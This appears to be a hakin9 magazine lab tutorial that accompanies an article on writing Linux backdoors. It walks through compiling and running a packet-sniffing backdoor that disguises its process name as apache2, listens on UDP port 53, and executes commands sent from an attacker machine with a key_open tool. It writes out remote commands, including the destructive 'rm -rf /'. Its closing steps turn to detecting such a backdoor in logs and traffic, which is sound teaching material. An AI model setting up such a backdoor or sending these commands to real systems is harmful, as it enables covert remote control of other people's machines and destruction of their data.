Tutorial for the article Writing advanced Linux backdoors – packet sniffing
This document is a tutorial accompanying the article Writing advanced Linux backdoors – packet sniffing. The aim of the tutorial is to practise the use of the backdoor presented in the article.
We will run our tests on two computers connected by a local network. The first computer (green) will act as the victim's machine. We will boot it from the hakin9.live CD and run the backdoor on it.
The other computer (red) will act as the intruder's machine. It need not be booted from hakin9.live – any Linux will do.
If you can't use two computers, you can execute the entire test on a single machine, but the result will not be as realistic.
[01]
Configure the local network according to the instructions found here on the hakin9.live CD. Boot the green computer from hakin9.live, and boot up the red computer as well. Make sure the two can ping each other.
Before we actually run the backdoor, it's worth having a look at what it does. Perform the steps outlined below on the green computer.
As you no doubt remember from the article, the backdoor code consists of three separate components to: change the process name, listen for packets on a specified port and process the packets received. Let's start by examining the component that changes the process name.
[02]
Save to disk and examine the source code of mask_process_name.c (html).
Compile it:
$ gcc mask_process_name.c -o mask_process_name
Now run it:
$ ./mask_process_name
[03]
Use another terminal to examine the process list:
$ ps ax
As you can see, the process name is displayed as /usr/sbin/apache2.
The next component of the backdoor is a loop that receives packets sent to a specific port.
[04]
Save to disk and examine the source code for pcap_test.c (html).
Compile it:
$ gcc -lpcap pcap_test.c -o pcap_test
Now run it as root:
# ./pcap_test
[05]
From the red computer, send a test packet to UDP port 53 of the green computer.
$ hping <green_ip> -p 53 -2 -c 1
If you don't have hping, you can use netcat:
$ nc -u <green_ip> 53
foobar
ctrl+d
[06]
Go back to the green computer. Can you see a message informing you that the packet was received?
[07]
Save to disk and examine the source code for silentdoor.c (html). Have a look at the two components you already know (for changing the process name and receiving packets) and the component that processes received packets. Compile the program:
$ gcc -lpcap silentdoor.c -o silentdoor
Now run it as root:
# ./silentdoor
[08]
On the red computer, save to disk the source code for key_open.c (html) – a program that allows you to send encrypted commands to the backdoor. Compile it:
$ gcc -lpcap key_open.c -o key_open
[09]
Use the key_open program to send the victim a command to execute. To start with, try to create a file called xxxx. Remember to run the program as root:
# ./key_open <green_ip>:93 'touch xxxx'
[10]
Go back to the green computer and stop the backdoor ([ctrl+c]). Now list the directory contents:
# ls
See the new file? Start the backdoor again.
[11]
Go back to the red computer. You can now execute any other commands, such as:
# ./key_open <green_ip>:93 'cat /dev/urandom > /dev/dsp'
# ./key_open <green_ip>:93 'eject'
# ./key_open <green_ip>:93 'rm -rf /'
Be careful! Remember that all your commands will actually be executed on the target system!
Now suppose that someone has managed to slip a similar backdoor into your system... Would you be able to detect it? Working on the green computer, try the following actions.
[12]
Have a look at the system logs.
# tail /var/log/messages
Can you see any information that indicates the presence of a backdoor? Can you see anything to suggest there is a program listening for incoming packets?
[13]
Run ethereal:
# ethereal
Start a capture session on the appropriate network interface.
[14]
Go back to the red computer and execute some remote commands, just like before. Have a look at the packets arriving at UDP port 53 of the green computer. Could you tell them apart from legitimate DNS replies?
[15]
Do you have any ideas for using knowledge gained from the article and this tutorial to detect the exploit and guard against it? If so, share them with others – visit our forum!